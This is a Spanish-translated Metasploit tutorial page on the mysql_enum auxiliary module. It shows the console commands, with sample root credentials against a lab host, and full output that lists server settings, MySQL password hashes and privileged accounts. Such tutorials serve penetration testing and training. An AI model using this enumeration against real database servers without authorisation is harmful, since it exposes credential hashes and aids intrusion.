Mysql/mysql enum

De www.metasploit-es.com.ar

El modulo "mysql_enum" conectara a un servidor de bases de datos MySQL remoto con un conjunto de credenciales dado y realizara una enumeracion basica sobre el.

msf > use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOST                      yes       The target address
   RPORT     3306             yes       The target port
   USERNAME                   no        The username to authenticate as

Para configurar el modulo, proporcionaremos los valores de PASSWORD, RHOST y USERNAME y lo correremos contra el objetivo.

msf auxiliary(mysql_enum) > set PASSWORD s3cr3t
PASSWORD => s3cr3t
msf auxiliary(mysql_enum) > set RHOST 192.168.1.201
RHOST => 192.168.1.201
msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_enum) > run

[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*] 	MySQL Version: 5.1.41
[*] 	Compiled for the following OS: Win32
[*] 	Architecture: ia32
[*] 	Server Hostname: xen-xp-sploit
[*] 	Data Directory: C:\xampp\mysql\data\
[*] 	Logging of queries and logins: OFF
[*] 	Old Password Hashing Algorithm OFF
[*] 	Loading of local files: ON
[*] 	Logins with old Pre-4.1 Passwords: OFF
[*] 	Allow Use of symlinks for Database Files: YES
[*] 	Allow Table Merge: 
[*] 	SSL Connection: DISABLED
[*] Enumerating Accounts:
[*] 	List of Accounts with Password Hashes:
[*] 		User: root Host: localhost Password Hash: *58C036CDA51D8E8BBBBF2F9EA5ABF111ADA444F0
[*] 		User: pma Host: localhost Password Hash: *602F8827EA283047036AFA836359E3688401F6CF
[*] 		User: root Host: % Password Hash: *58C036CDA51D8E8BBBBF2F9EA5ABF111ADA444F0
[*] 	The following users have GRANT Privilege:
[*] 		User: root Host: localhost
[*] 		User: root Host: %
[*] 	The following users have CREATE USER Privilege:
[*] 		User: root Host: localhost
[*] 		User: root Host: %
[*] 	The following users have RELOAD Privilege:
[*] 		User: root Host: localhost
[*] 		User: root Host: %
[*] 	The following users have SHUTDOWN Privilege:
[*] 		User: root Host: localhost
[*] 		User: root Host: %
[*] 	The following users have SUPER Privilege:
[*] 		User: root Host: localhost
[*] 		User: root Host: %
[*] 	The following users have FILE Privilege:
[*] 		User: root Host: localhost
[*] 		User: root Host: %
[*] 	The following users have POCESS Privilege:
[*] 		User: root Host: localhost
[*] 		User: root Host: %
[*] 	The following accounts have privileges to the mysql databse:
[*] 		User: root Host: localhost
[*] 		User: root Host: %
[*] 	The following accounts are not restricted by source:
[*] 		User: root Host: %
[*] Auxiliary module execution completed
msf auxiliary(mysql_enum) >

Original de www.offensive-security.com
Traducido por cbk999

Mysql/mysql enum

De www.metasploit-es.com.ar

Vistas

Herramientas personales

Navegación

Buscar

Herramientas